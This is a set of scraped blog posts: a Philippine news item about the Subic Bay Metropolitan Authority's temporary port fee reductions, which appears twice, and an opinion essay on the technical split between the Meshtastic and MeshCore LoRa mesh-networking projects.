Aliño added that such temporary measures aim to provide aid to industries affected by the Middle East crisis by ensuring that cost-stabilizing strategies for the transport and food sectors are implemented without delay.
“These initiatives, including reduced fees and extended free storage, provide a fiscal cushion to reinforce investor confidence and prevent supply chain bottlenecks,” said Aliño.
He also cited that key industry participants namely, importers, suppliers, consignees, vessel owners, and consumers, will experience the impact of these measures through their respective counterparts – terminal operators, cargo handlers, brokers, consolidators, processors, ship agents, and shipping lines, resulting in a cascading effect throughout the supply chain.
As part of this initiative, the SBMA will implement a five percent tariff reduction on all commercial vessels, including harbor fees, berthing fees/ anchorage fees, and harbor cleaning fees, as well as a five percent tariff reduction on cargo charges including wharfage fees, and storage fees.
“We will also implement a five percent tariff reduction on SBMA shares such as pilotage fee, hauling services, tugboat services, heavy equipment rental, line handling services, chandling services, water tendering, cargo handling for containerized cargo, and bunkering services,” he added.
Additionally, the SBMA is also offering free storage for non-containerized cargo, and free storage period for an additional 2-day extension.To further aid port clients, the SBMA will temporarily suspend the collection of shares from terminal operators/cargo handlers for liquid bulk cargo handling and related activities; the implementation of the one percent admission fee for liquid bulk; and the implementation of the ten percent increase on cargo handling and miscellaneous charges of non-containerized/ general cargoes.
Chairman Aliño assured port stakeholders that these measures shall take effect immediately upon its approval and ratification by the SBMA Board of Directors, adding that these will remain in force until geopolitical tensions subside, at which point they shall be lifted via a formal issuance following Board approval.
Let me end this post by asking you readers: What is your reaction to this recent development? Do you think this new move by the SBMA will be sufficient enough for the port clients and keep economic activity in the freeport growing? Do you think the SBMA will have to further intensify its tourism activities to attract more high-spending tourists to bounce back from a potential economic downturn?
You may answer in the comments below. If you prefer to answer privately, you may do so by sending me a direct message online.
+++++
Thank you for reading. If you find this article engaging, please click the like button below, share this article to others and also please consider making a donation to support my publishing. If you are looking for a copywriter to create content for your special project or business, check out my services and my portfolio. Feel free to contact me with a private message. Also please feel free to visit my Facebook page Author Carlo Carrasco and follow me on Twitter at @CarloCarrascoPH as well as on Tumblr at https://carlocarrasco.tumblr.com/ and on Instagram athttps://www.instagram.com/authorcarlocarrasco
#ASEAN #Asia #AssociationOfSoutheastAsianNationsASEAN #Bing #Blog #blogger #blogging #BongbongMarcos #business #businessNews #CarloCarrasco #ChatGPT #economicDynamism #economicGrowth #economics #economy #EconomyOfSubicBay #EconomyOfThePhilippines #EduardoJoseLAliño #energy #Facebook #foreignInvestment #foreignInvestors #foreignTourists #fuel #geek #Google #GoogleSearch #governance #holiday #Instagram #Investagrams #investment #investors #localTourists #Marcos #news #oil #Philippines #PhilippinesBlog #Pinoy #portOperations #PresidentMarcos #publicService #SBMA #socialMedia #SoutheastAsia #SubicBay #SubicBayFreeportZone #SubicBayMetropolitanAuthoritySBMA #technology #tourism #tourismBlog #tourists #travel #travelBlog #Tumblr #Twitter #WordPress #WordPressCom -
Temporary Reduced Fees And Support For Port Clients Confirmed By SBMA
In response to the spiked fuel prices and other economic uncertainties, the Subic Bay Metropolitan Authority (SBMA) announced that it will temporarily offer reduced fees and provide financial support to its port clients.
To put things in perspective, posted below is an excerpt from official announcement by the SBMA. Some parts in boldface…
The Subic Bay Metropolitan Authority (SBMA) has temporarily taken measures to provide port clients with the much-needed financial support, amid the ongoing rise in fuel costs in the global market.
SBMA Chairman and Administrator Eduardo Jose L. Aliño explained that this is in line with President Ferdinand R. Marcos Jr.’s Executive Order No. 110, which immediately placed the entire country in a state of national energy emergency due to geopolitical tensions in the Middle East.
Aliño added that such temporary measures aim to provide aid to industries affected by the Middle East crisis by ensuring that cost-stabilizing strategies for the transport and food sectors are implemented without delay.
“These initiatives, including reduced fees and extended free storage, provide a fiscal cushion to reinforce investor confidence and prevent supply chain bottlenecks,” said Aliño.
He also cited that key industry participants namely, importers, suppliers, consignees, vessel owners, and consumers, will experience the impact of these measures through their respective counterparts – terminal operators, cargo handlers, brokers, consolidators, processors, ship agents, and shipping lines, resulting in a cascading effect throughout the supply chain.
As part of this initiative, the SBMA will implement a five percent tariff reduction on all commercial vessels, including harbor fees, berthing fees/ anchorage fees, and harbor cleaning fees, as well as a five percent tariff reduction on cargo charges including wharfage fees, and storage fees.
“We will also implement a five percent tariff reduction on SBMA shares such as pilotage fee, hauling services, tugboat services, heavy equipment rental, line handling services, chandling services, water tendering, cargo handling for containerized cargo, and bunkering services,” he added.
Additionally, the SBMA is also offering free storage for non-containerized cargo, and free storage period for an additional 2-day extension.To further aid port clients, the SBMA will temporarily suspend the collection of shares from terminal operators/cargo handlers for liquid bulk cargo handling and related activities; the implementation of the one percent admission fee for liquid bulk; and the implementation of the ten percent increase on cargo handling and miscellaneous charges of non-containerized/ general cargoes.
Chairman Aliño assured port stakeholders that these measures shall take effect immediately upon its approval and ratification by the SBMA Board of Directors, adding that these will remain in force until geopolitical tensions subside, at which point they shall be lifted via a formal issuance following Board approval.
Let me end this post by asking you readers: What is your reaction to this recent development? Do you think this new move by the SBMA will be sufficient enough for the port clients and keep economic activity in the freeport growing? Do you think the SBMA will have to further intensify its tourism activities to attract more high-spending tourists to bounce back from a potential economic downturn?
You may answer in the comments below. If you prefer to answer privately, you may do so by sending me a direct message online.
+++++
Thank you for reading. If you find this article engaging, please click the like button below, share this article to others and also please consider making a donation to support my publishing. If you are looking for a copywriter to create content for your special project or business, check out my services and my portfolio. Feel free to contact me with a private message. Also please feel free to visit my Facebook page Author Carlo Carrasco and follow me on Twitter at @CarloCarrascoPH as well as on Tumblr at https://carlocarrasco.tumblr.com/ and on Instagram athttps://www.instagram.com/authorcarlocarrasco
#ASEAN #Asia #AssociationOfSoutheastAsianNationsASEAN #Bing #Blog #blogger #blogging #BongbongMarcos #business #businessNews #CarloCarrasco #ChatGPT #economicDynamism #economicGrowth #economics #economy #EconomyOfSubicBay #EconomyOfThePhilippines #EduardoJoseLAliño #energy #Facebook #foreignInvestment #foreignInvestors #foreignTourists #fuel #geek #Google #GoogleSearch #governance #holiday #Instagram #Investagrams #investment #investors #localTourists #Marcos #news #oil #Philippines #PhilippinesBlog #Pinoy #portOperations #PresidentMarcos #publicService #SBMA #socialMedia #SoutheastAsia #SubicBay #SubicBayFreeportZone #SubicBayMetropolitanAuthoritySBMA #technology #tourism #tourismBlog #tourists #travel #travelBlog #Tumblr #Twitter #WordPress #WordPressCom -
The Broken Mesh: Why the Fight Between Meshtastic and MeshCore Matters
2,734 words, 14 minutes read time.
The fracture between the Meshtastic and MeshCore projects is a warning that you cannot ignore. For years, people thought a simple, off-grid data net was the answer for when the main lines go down. But now, the community is divided. This is not just a small fight over code. It is a total disagreement on how to handle communication when things get ugly. If you think you are ready just because you bought a cheap radio board and did not bother to learn how the software actually works, you are just a hobbyist playing with toys. The rift between Meshtastic and MeshCore shows how fragile these systems are and why you need to know your gear inside and out. A mesh net is only as good as its weakest link. If you do not master the tech, you are just a dead node in a silent town. We are seeing the growing pains of a decentralized technology that is outstripping the discipline of its users. You must choose your tools based on the reality of the physics, not the popularity of the app. Demand that your firmware be an efficient tool for data transmission, not a bloated social media platform for the 915 MHz band. If you do not take the time to understand the modulation, the packet structure, and the routing logic of the software you flash onto your hardware, you are just a child playing with a walkie-talkie while the grown-ups are trying to build a grid. Mastery of the radio spectrum is not an option; it is a requirement for anyone who claims to be prepared. This split is the first real test of whether civilian mesh can survive the chaos of its own success. You either learn to navigate the airwaves or you signal your own failure. Every packet you send without understanding the cost is a round wasted in a firefight. Stop treating your emergency comms like a smartphone app and start treating it like the life-support system it is. This technical mastery is the difference between a working link and a radio that does nothing but drain your battery in the dark.
Troubleshooting LoRa Mesh Protocol Inefficiency and Network Congestion
The fight between Meshtastic and MeshCore comes down to how they use the radio waves and the small chips that run them. Meshtastic has been the big name for a long time. It uses a flooding method where every radio repeats every message it hears. In the woods, that is fine. In a city with a hundred users, it is a train wreck. The air gets crowded, messages hit each other, and the whole system jams itself. MeshCore did not start because people wanted a new app. It started because the old way is inefficient. The core of the split is about the overhead—the extra data that hitches a ride on every message. Meshtastic adds a lot of features, but those features take up space. MeshCore wants to strip everything down to the bone so the network stays stable. When you have very little room to send data, every extra bit is a mistake. This is a battle between lots of features and it just has to work. If your software is fighting your hardware, you lose. The divergence between Meshtastic and MeshCore is rooted in the physics of the 900 MHz ISM band and the limitations of the ESP32 and nRF52 chipsets. As the node count grows, the airwaves become a chaotic mess of collisions and retransmissions, effectively jamming the very frequency the operators are trying to utilize. While Meshtastic has focused on a feature-rich user experience with a heavy reliance on a specific structure, MeshCore proponents argue for a leaner, more modular approach that prioritizes the stability of the underlying mesh over the bells and whistles of the interface. When you are operating on a low-bandwidth, high-latency medium like LoRa, every byte of overhead is a liability. You either master the protocol or you become a dead node. The math does not lie even if the marketing does. If your network protocol consumes more than ten percent of your bandwidth for heartbeats, your network is dying. Every extra feature in the code is another potential point of failure when the signal gets weak. You have to decide if you want a chat app or a survival tool. The flooding algorithm used by Meshtastic is a blunt instrument that was never meant for high-density urban deployment. It works by simply re-broadcasting every unique packet received until a hop limit is reached. In a sparse environment, this ensures the message gets through by any means necessary. But as the number of nodes increases, the probability of two nodes transmitting at the same time goes up. This leads to packet collisions where neither message is readable. MeshCore attempts to solve this by moving toward a more structured routing system. This means the software tries to figure out the best path for a message instead of just yelling it to everyone. This shift requires a level of technical discipline that many casual users find frustrating. It means the network is less plug-and-play and more of a precision tool. If you want a network that survives a real crisis, you have to move away from the chaos of flooding. You have to understand how the Media Access Control layer handles traffic. You have to know how to set your timing parameters so you are not stepping on your own neighbors. The split is a clear line in the sand between those who want ease of use and those who want engineering reliability. You cannot hide from the physics of the airwaves. Either your packets move or they die in the dirt. Stop assuming the software will fix your bad placement. Fix the engineering or get off the air.
Physics of LoRa Packet Collisions and Signal to Noise Ratio Analysis
To understand this split, you have to look at how these radios actually talk. They use a low-power system called LoRa. It is built for long range, but it is slow. There are strict rules on how long you can broadcast before you have to shut up and let others speak. Because Meshtastic repeats everything, adding more people makes the problem worse fast. This is not a glitch. It is physics. MeshCore was built to change how messages find their path through the net. Instead of everyone yelling at once, it wants a smarter way to move data that does not waste airtime. The split happened because one group likes the safety of repeating everything, while the other wants a clean, quiet network. If your radio is spending eighty percent of its power just saying I am here, you are not communicating—you are just making noise. The split proves that the current path is heading for a crash where no one can get a message through. LoRa is designed for long-range, low-power communication, but it is inherently limited by the Duty Cycle regulations of the FCC Part 15 and similar international bodies. Meshtastic’s current implementation of the flooding protocol means that as you add more users, the probability of packet storms increases exponentially. MeshCore was conceptualized to address the need for a more rigid, perhaps even more disciplined, routing logic that could potentially mitigate the hidden node problem and reduce the airtime usage per packet. The technical fallout between the two development paths stems from a disagreement on how to manage the limited airtime of the ISM band. One camp believes in the resilience of redundant flooding, while the other seeks a more surgical, routed approach to data delivery. This is a matter of Spectral Efficiency. If your mesh is using the majority of its available airtime just to say it exists, you have failed as an operator and an engineer. You are polluting the spectrum with digital noise. This noise prevents emergency traffic from getting through. It creates a false sense of security where people think they have a working link when they actually have a jammed one. You must look at the duty cycle of your own node. If you are transmitting more than one percent of the time in the 900 MHz band, you are likely part of the problem. MeshCore is an attempt to force the network into a more responsible state. It prioritizes the survival of the link over the convenience of the user. This is a hard truth that many do not want to hear. Physics does not care about your feelings or your user interface. It only cares about the signal-to-noise ratio. If your signal is lost in the noise of your own network, you have built nothing but a very expensive paperweight. Every packet sent is a risk. In a real-world scenario, a long transmission can be used to find your location. Flooding makes this risk much higher because your message is repeated over and over by every node in the area. A routed system like what MeshCore aims for reduces this risk by limiting the number of times a message is sent. This is not just about efficiency; it is about security. You have to understand that the airwaves are a shared resource. If you treat them like your own personal garbage dump, you will find yourself alone and unheard when the time comes to actually send a call for help. The split between Meshtastic and MeshCore is a debate over the very future of private, off-grid data. One side wants to make it accessible to everyone, while the other wants to make it work when nothing else does. You have to decide which side of that line you stand on. If you are not monitoring your packet loss and your noise floor, you are not an operator. You are just a passenger in a system that is bound to fail. Stop looking at the colorful screens and start looking at the spectrum. The truth is in the waterfall, not the icons. The physics of 915 MHz demand respect that a plug and play mindset cannot provide.
Off-Grid Communication Solutions and Technical Radio Discipline
The result of this fight is a mess where gear running one software will not talk to gear running the other. For you, that means your radio is a brick if your neighbor is on the other side of the fence. This is how a mesh net dies. A mesh needs everyone to speak the same language. When the builders split, the network breaks. This should wake up anyone who thinks they can just download a file and be safe. The hard truth is that we are seeing a new tech grow too fast for the people using it. You have to pick your tools based on facts, not what looks cool. Demand software that moves data fast and clean. If you do not know how your radio sends a packet or why some settings work better than others, you have no business relying on this in a pinch. The split between Meshtastic and MeshCore is a reminder that in the world of radio, there are no shortcuts. For the operator in the field, this means your gear might be useless if the person three blocks away is running a different branch of the protocol. This is the death of a mesh. A mesh requires a common language, a shared set of timing parameters, and a unified understanding of frequency hopping and spreading factors. When the developers split, the network breaks. This should serve as a wake-up call to anyone who thinks they can outsource their emergency communications to a GitHub repository they do not understand. The split between Meshtastic and MeshCore is a reminder that in the world of RF, there are no shortcuts. If you cannot explain the difference between a Spreading Factor of seven and twelve, or why a 125kHz bandwidth is preferable over 250kHz in a high-noise environment, you have no business relying on these tools. The hard truth is that we are witnessing the growing pains of a decentralized technology that is outstripping the discipline of its users. You must take personal responsibility for your station. This means testing your range with real-world obstacles. It means understanding how your antenna height and gain affect your local mesh. It means being able to re-flash your firmware in the dark while the rain is pouring down. If you cannot do these things, you are not prepared. You are just a collector of electronic gadgets. The discipline of the amateur radio spirit must be applied to these new digital modes. We are losing the technical edge that made the license worth having in the first place. The split is a chance to reset. It is a chance to move away from the appliance operator mindset and back toward the engineering mindset. You should be auditing your own mesh. Look at the traffic logs. See how many packets are being dropped. See how many of your traffic is just node discovery overhead. If you find that your network is inefficient, do not wait for a developer to fix it. Change your settings. Educate your neighbors. If the split leads to a better, more efficient protocol, then it was worth the friction. But if it just leads to two broken networks instead of one, then we have all lost. The practical application of this knowledge is simple: test everything. Do not assume your mesh will work because the light on the board is green. Prove it. Send data over the longest possible path. Monitor the battery drain. Watch the spectrum on an analyzer if you have one. If you do not have the tools to verify your network, you do not have a network. You have a hope. And hope is not a plan for communication. Secure your nodes, harden your protocol, and stop relying on software you have never bothered to read. The day is coming when the only thing between you and the void is the connection you built yourself. Don’t let it be a connection built on laziness. Clean up your messy node or accept that you will be silent when it matters.
Conclusion: The Future of Decentralized Mesh Networks and User Mastery
The discipline of the old-school radio operator has to be applied here or the whole thing will fail. The split between Meshtastic and MeshCore is a call to stop being a lazy user and start being a real operator. We do not have time for good enough when the grid is down. Check your gear, learn the rules of the airwaves, and be ready for a future where the channels are full and the software is broken. Build your setup expecting things to break. There is no room for being soft. Learn the math, understand your range, and make sure every message you send is worth the airtime. The grid is weak, the airwaves are crowded, and your own lack of knowledge is the only thing truly blocking your signal. Fix your gear, learn the system, and stop waiting for someone else to save you. The grid is fragile, the spectrum is finite, and your ignorance is the only thing standing between you and a total blackout. Fix your station, fix your protocol, and stop waiting for someone else to secure your link. The time for playing games with digital toys is over. Mastery is the only way forward. Master the code, master the RF, or stay off the air. This hobby demands engineers, not appliance operators. Be the asset the network needs, not the QRM that kills it. Finalize your build, test the link, and maintain the discipline required to keep the airwaves open for those who truly need them.
Call to Action
Join the Network and Master Your Comms Before the Grid Goes Dark. The split between Meshtastic and MeshCore is a wake-up call for every operator. You cannot afford to be a passive user when the lines of communication are at stake. Whether you choose the feature-rich path or the lean efficiency of the core, the responsibility for a working link lies with you. Don’t wait for a crisis to realize your nodes are misconfigured or your protocol is inefficient. Start auditing your setup today by getting out in the field to find your real-world limits, diving into the spreading factors to clear the noise, and educating your local mesh to ensure your neighborhood stays connected. The airwaves belong to those who master them. Secure your hardware, flash your firmware, and become a reliable node in the decentralized future. Join the conversation, build the grid, and stay off the silent list.
SUPPORTSUBSCRIBECONTACT MED. Bryan King
Sources
- FCC Part 15 Radio Frequency Devices – Federal Communications Commission
- SX1262 LoRa Transceiver Datasheet – Semtech
- Meshtastic Project Documentation – Meshtastic
- A Study of LoRa: Long Range and Low Power Networks for the Internet of Things – IEEE
- The ARRL Handbook for Radio Communications – ARRL
- Guide to Bluetooth Security (RF Protocol Standards) – NIST
- LoRaWAN 1.1 Specification – LoRa Alliance
- Do LoRa Low-Power Wide-Area Networks Scale? – IEEE
- ESP32 Series Datasheet – Espressif Systems
- nRF52840 Product Specification – Nordic Semiconductor
- Terminology for Constrained-Node Networks – IETF
- ITU Handbook on Land Mobile Communications – International Telecommunication Union
- Protocol Buffers Documentation – Google Developers
- Understanding the Basics of LoRa and LoRaWAN – DigiKey
- LoRa Technology: A Technical Overview – NXP Semiconductors
- LoRaWAN Documentation – The Things Network
- Guide to Bluetooth Security – NIST Special Publication
- LoRa Physical Layer Packet Structure – RF Wireless World
- LoRa Wireless Technology – Microchip Technology
- Understanding and Enhancing RF Link Budget – Analog Devices
- LoRaWAN Technology Overview – STMicroelectronics
- Analysis of the Capacity and Scalability of LoRaWAN – ResearchGate
- Fundamentals of the LoRa Physical Layer – EDN Network
- What is LoRa Technology? – everything RF
- Link Budget Basics – Microwaves101
- LoRa Long Range Technology Overview – Texas Instruments
- Scalability of LoRaWAN for Massive IoT Deployment – MDPI Sensors
- Detailed Study of LoRa Low Power Communications – PMC
- 11 Myths About LoRa and LoRaWAN – Electronic Design
- LoRa Modulation Basics – Microwave Journal
Disclaimer:
The views and opinions expressed in this post are solely those of the author. The information provided is based on personal research, experience, and understanding of the subject matter at the time of writing. Readers should consult relevant experts or authorities for specific guidance related to their unique situations.
Related Posts
Rate this:
#915MHz #airtimeOptimization #AmateurRadio #antennaGain #bandwidthManagement #communicationSecurity #communityMesh #constrainedNodes #dataTransmission #DecentralizedNetworks #digitalModes #DisasterRecovery #dutyCycle #emergencyComms #ESP32 #FCCPart15 #firmwareFlashing #floodingProtocol #gridDownComms #hiddenNodeProblem #IoTScalability #ISMBand #linkBudget #LoRa #LoRaWAN #meshNetworking #MeshCore #Meshtastic #networkCongestion #nodeDensity #nRF52840 #offGridCommunication #packetCollisions #packetLoss #protocolOverhead #radioDiscipline #radioFrequency #RFEngineering #RFInterference #routingLogic #signalPropagation #SignalToNoiseRatio #SNR #spectralEfficiency #spreadingFactor #survivalTech #SX1262 #TacticalComms #wirelessProtocols